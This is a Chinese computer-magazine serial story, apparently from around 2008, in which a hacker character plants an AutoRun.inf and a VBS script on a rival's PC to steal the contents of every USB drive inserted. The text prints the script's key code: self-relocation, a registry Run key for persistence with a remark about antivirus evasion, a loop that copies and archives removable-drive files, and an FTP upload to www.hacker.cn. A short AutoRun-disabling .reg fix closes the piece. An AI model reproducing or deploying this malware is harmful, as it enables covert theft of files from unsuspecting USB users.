攻防博弈第七幕：暗算黑客K，摆渡技术“出马”

网络安全

张桂月

博弈主题：闪存窃密

技术难度：★★★★★

重点知识：如何运用摆渡技术

黑客入侵另一个黑客，不仅仅是一种技术的挑战，更是谋略与心理的双重考验。因为对方不仅仅拥有防范的技术，最关键的是，你所使用的手段，可能也是他玩过的。为了对付黑客K ，小蝶决定通过杜金电脑间接入侵。

上期小蝶通过蜜罐系统找到了黑客的攻击来源，她发现攻击者来自杜金的TT公司。难道TT公司雇佣了黑客？他从UU公司盗走了多少资料？想要获知答案必须揭开TT公司黑客的真面目。

小蝶不仅仅是黑客，她还是天生的谋略大师，她的手包里永远会装着一本《孙子兵法》，而她最喜欢读的章节就是“谋攻”。用最小的消耗，换取最大的胜利。用各种方法避免乱战强攻，既取得胜利，又避免无谓的牺牲。完美的计谋是计划能否成功的一半，小蝶的高明所在是她并不打算和黑客K直接对垒，而是要利用摆渡技术间接暗算——黑客K做梦也想不到杜金电脑上有“机关”。

小知识：摆渡技术原意为通过存储介质，将未接入互联网的电脑中的信息复制上传到互联网中，也称之为数据摆渡。黑客利用这种技术，可以让受害者上传第三方数据资料。这种技术在2008年很受黑客的青睐。

围绕闪存发生的阴谋和阳谋

一位情绪看似非常消沉的女孩——小蝶，坐在TT公司的总经理室外。杜金故意拖延了相当长的时间才叫女孩进来，他想通过这种方式提醒女孩，这次会见是她主动要求的——虽然杜金内心的急切并不比那个女孩差多少。

杜金努力地压抑住心中的兴奋，淡淡地问道:“林小姐，你手中的图纸真的是UU公司的设计方案吗？”“我想您是这方面的行家，看一眼就知道了，文件就在我随身带着的闪存上。”小蝶非常自信地答道。

小蝶坐到杜金的电脑前，插入闪存，很自然地选中了“设计原图”文件夹中的部分图纸文件，拖动它们到系统的桌面上，然后拔下闪存装到了自己贴身的手包中。“我相信您能够分辨出真伪。”女孩儿点开图纸文件，让杜金查看。

小蝶并不想让杜金有充分的时间仔细查看图纸，仅仅两分钟她就关闭了设计图，按组合键“Shift+Del”删除了拷贝过来的所有文件。结束后，她焦急而又期待地对杜金说：“怎么样，如果您同意我说的价钱，这个闪存现在就是您的。”

“这可不是一笔小钱，我再考虑一下好吗？”杜金狡诈地回答道。杜金礼貌地送走了小蝶，自言自语：“虽然只是一部分图纸，也够我们研究一阵”。杜金迅速拿起电话，拨通了黑客K的电话：“你马上过来一下。”黑客K放下电话之后匆匆赶到了杜金的办公室。

“刚才我误删除了一个文件，我记得你能做文件恢复，赶紧帮我恢复一下。”

黑客K“哦”了一声，从口袋里掏出自己的闪存插入杜金的电脑，用里面保存的恢复软件帮助杜金恢复文件，他闪存里面一直留有许多工具，以方便自己随时使用。

此时的黑客K并不知道，所有插入杜金电脑的闪存，里面的文件都会打包并源源不断地上传到小蝶准备的服务器中，而自己竟然成为第一个受害者。

AutoRun背后的秘密

在黑客K迈进杜金办公室3小时之前，在那个看似普通的闪存中，小蝶亲手制作了两个特别文件。小蝶首先新建了一个记事本文件，然后另存为AutoRun.inf，保存在闪存根目录中。

小知识：AutoRun是自动运行功能，很多病毒都喜欢利用它。它运行时，会搜索名为“AutoRun.inf”的配置文件，从文件的内容中读取要自动运行的程序。

随后，她在AutoRun.inf中逐一输入命令（见图）。AutoRun.inf文件中的命令相当简单，[AutoRun]作为开头，是所有的AutoRun.inf开头都必须存在的命令。Open=ran.vbs指示闪存插入运行脚本程序ran.vbs。

制作偷窃文件的VBS脚本

在小蝶的计划中，最为关键的是制作VBS脚本程序，通过这个“摆渡”脚本，小蝶可以窃取插入杜金电脑的闪存中的文件。小蝶又新建了一个记事本，在里面将自己设计的代码逐行输入，另存为“ran.vbs”，VBS脚本程序就制作好了。VBS脚本关键代码如下所示（VBS脚本下载地址：http://www.cpcw.com）：

if not(fso.fileexists(dir&"ftp.txt")) then

set ftpfile=fso.opentextfile(dir&"\ftp.txt",2,true,0)

ftpfile.write("open www.hacker.cn"&vbcrlf&"abc"&vbcrlf&"abc"&vbcrlf&"put c:\windows\temp\upload\*.rar"&vbcrlf&"bye"&vbcrlf)

ftpfile.close

end if

这里用到了VBS的文件写入功能，目的是将FTP信息写入FTP.txt，IP地址为用户设置的FTP地址，“&vbcrlf&”是换行符。

if not(fso.fileexists(dir&"\copy.vbs")) then

fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")

end if

最后判断自己是否在系统文件夹中，如果不是就进行移动，原理与木马非常相似。

fso.createfolder("c:\windows\temp\ufile")

fso.createfolder("c:\windows\temp\upload")

创建两个文件夹，一个用来复制文件，一个用来放置压缩后的上传文件

cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","copy.vbs","REG_SZ"

这里调用的是我们之前定义的“wscropt.shell”的变量，现在用它来写入注册表，以便每次开机都执行，这里也是杀毒软件的反应点，所以免杀都在这里进行！

for i=1 to 2

i=1

定义了一个死循环，为了让程序一直运行下去

for each f in mdy

if f.drivetype=1 then

n=f.path

判断有没有闪存插入

fso.copyfile n&"\*","c:\windows\temp\ufile\"

对文件进行复制

fso.copyfolder n&"\*","c:\windows\temp\ufile"

对文件夹进行复制

cmd.run "cmd /c rar a -ag -df c:\windows\temp\upload\ c:\windows\ufile",0

对复制出的文件和文件夹进行压缩

cmd.run "cmd /c ftp -s:ftp.txt",0

将压缩好的文件上传至FTP.txt 指定的FTP地址

小知识：VBS是一种基于Basic语言的脚本语言。用它编写的程序，不需要编译成.exe，操作系统可以直接执行.vbs的源程序。

屏蔽AutoRun隐患

小蝶新建了一个记事本，在其中输入以下内容后将记事本另存为“NoAuto.reg”，然后她将此文件发送到所有UU公司员工邮箱中，告诉他们双击运行即可防范BVS脚本。

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\ Policies\Explorer]

"NoDriveTypeAutoRun"=dword:000000ff

"ClassicShell"=dword:00000001